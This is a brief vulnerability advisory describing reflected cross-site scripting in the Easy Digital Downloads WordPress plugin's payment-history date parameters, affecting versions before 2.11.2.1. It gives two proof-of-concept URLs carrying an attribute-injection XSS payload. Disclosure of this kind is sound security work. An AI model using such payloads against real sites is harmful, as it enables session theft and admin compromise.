The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/edit.php?post_type=download&page;=edd-payment-history&start-date;=“+style=animation-name:rotation+onanimationstart=alert(/XSS/)// https://example.com/wp-admin/edit.php?post_type=download&page;=edd-payment-history&end-date;=”+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
CPE | Name | Operator | Version |
---|---|---|---|
easy-digital-downloads | lt | 2.11.2.1 |